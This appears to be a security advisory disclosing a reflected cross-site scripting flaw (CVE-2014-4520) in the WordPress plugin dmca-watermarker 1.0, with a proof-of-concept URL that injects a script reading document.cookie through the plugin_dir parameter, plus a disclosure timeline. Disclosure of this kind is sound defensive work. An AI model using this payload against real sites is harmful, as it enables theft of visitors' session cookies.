wp-plugin : dmca-watermarker – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : dmca-watermarker

 

Effected Version : 1.0 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

PoC:
http://locahost/wordpress/wp-content/wp-plugs/dmcawatermarker/phprack.php?plugin_dir=plugin_dir%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Vulnerable Parameter : plugin_dir

Trac ChangeLog :
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=904684%40dmca-watermarker&old=549072%40dmca-watermarker

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-21

 
Plugin Status : Updated on 2014-01-11
 
Public Disclosure : May 28, 2014
 
CVE Number : CVE-2014-4520

 
Plugin Description :
 
The DMCA.com WaterMarker plugin for WordPress allows you to easily integrate DMCA.com's WaterMarking for a specific folder into your WordPress site.
For more information about the features & benefits of the service visit [DMCA.com](http://www.dmca.com/protection.aspx?ad=wpo)

[» Register](http://www.dmca.com/Badges.aspx?ad=wpo) | [» Learn More](http://www.dmca.com/Protection.aspx?ad=wpo) | [» Upgrade to Pro](https://www.dmca.com/Toolkit/signup.aspx?lnk=wps&mpi=DMCA%20Toolkit)

Once installed and activated, you can use the DMCA WaterMarker page in your Dashboard's Settings Menu to specify how your choice of badge should be displayed in posts and pages. You can also choose to display your badge site-wide using the DMCA Badge Widget. You can use the badges for free but we suggest that you sign up for an account at dmca.com in order to receive the full benefit of the certified badges.

Leave a Reply

Your email address will not be published. Required fields are marked *